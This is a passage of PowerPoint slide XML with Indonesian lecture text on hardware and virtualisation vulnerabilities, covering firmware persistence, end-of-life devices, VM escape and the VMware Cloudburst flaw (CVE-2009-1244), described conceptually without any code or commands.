            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hard drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penginstalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (EOL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada firmware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Virtualisasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghematan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelarian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Cloudburst" pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual VMware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Cloudburst, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVE-2009- 1244, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2009 di ESX Server VMware, platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mesin</a:t>
            </a:r>
            <a:r>
